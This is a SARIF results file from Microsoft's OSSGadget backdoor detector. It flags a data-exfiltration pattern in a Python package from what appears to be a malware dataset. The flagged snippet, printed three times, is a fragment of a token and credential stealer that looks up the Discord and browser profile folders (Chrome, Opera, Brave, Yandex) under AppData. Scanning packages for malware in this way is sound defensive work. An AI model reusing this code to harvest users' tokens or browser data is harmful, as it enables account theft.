{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.1.428+ed0e2cfe6a"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000702"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration (Environment)",
            "id": "BD000702"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "./datasets/malware/dataset2/fijiwashere12323-0.0.0-r0.apk/fijiwashere12323-0.0.0-r0/usr/lib/python3.12/site-packages/fijitestinglol12333/__init__.py"
                },
                "region": {
                  "startLine": 14,
                  "startColumn": 17,
                  "endLine": 14,
                  "endColumn": 45,
                  "snippet": {
                    "text": "\t\t\t\tfor F in re.findall(E,D):C.append(F)\n\treturn C\ndef A():\n\tP='url';C=os.getenv('LOCALAPPDATA');B=os.getenv('APPDATA');J={'Discord':B+'\\Discord','Discord Canary':B+'\\discordcanary','Discord PTB':B+'\\discordptb','Google Chrome':C+'\\Google\\Chrome\\User Data\\Default','Opera':B+'\\Opera Software\\Opera Stable','Brave':C+'\\BraveSoftware\\Brave-Browser\\User Data\\Default','Yandex':C+'\\Yandex\\YandexBrowser\\User Data\\Default'};A=''\n\tfor (K,D) in J.items():\n\t\tif not os.path.exists(D):continue\n\t\tA+=f'\n",
                    "rendered": {
                      "text": "\t\t\t\tfor F in re.findall(E,D):C.append(F)\n\treturn C\ndef A():\n\tP='url';C=os.getenv('LOCALAPPDATA');B=os.getenv('APPDATA');J={'Discord':B+'\\Discord','Discord Canary':B+'\\discordcanary','Discord PTB':B+'\\discordptb','Google Chrome':C+'\\Google\\Chrome\\User Data\\Default','Opera':B+'\\Opera Software\\Opera Stable','Brave':C+'\\BraveSoftware\\Brave-Browser\\User Data\\Default','Yandex':C+'\\Yandex\\YandexBrowser\\User Data\\Default'};A=''\n\tfor (K,D) in J.items():\n\t\tif not os.path.exists(D):continue\n\t\tA+=f'\n",
                      "markdown": "`\t\t\t\tfor F in re.findall(E,D):C.append(F)\n\treturn C\ndef A():\n\tP='url';C=os.getenv('LOCALAPPDATA');B=os.getenv('APPDATA');J={'Discord':B+'\\Discord','Discord Canary':B+'\\discordcanary','Discord PTB':B+'\\discordptb','Google Chrome':C+'\\Google\\Chrome\\User Data\\Default','Opera':B+'\\Opera Software\\Opera Stable','Brave':C+'\\BraveSoftware\\Brave-Browser\\User Data\\Default','Yandex':C+'\\Yandex\\YandexBrowser\\User Data\\Default'};A=''\n\tfor (K,D) in J.items():\n\t\tif not os.path.exists(D):continue\n\t\tA+=f'\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}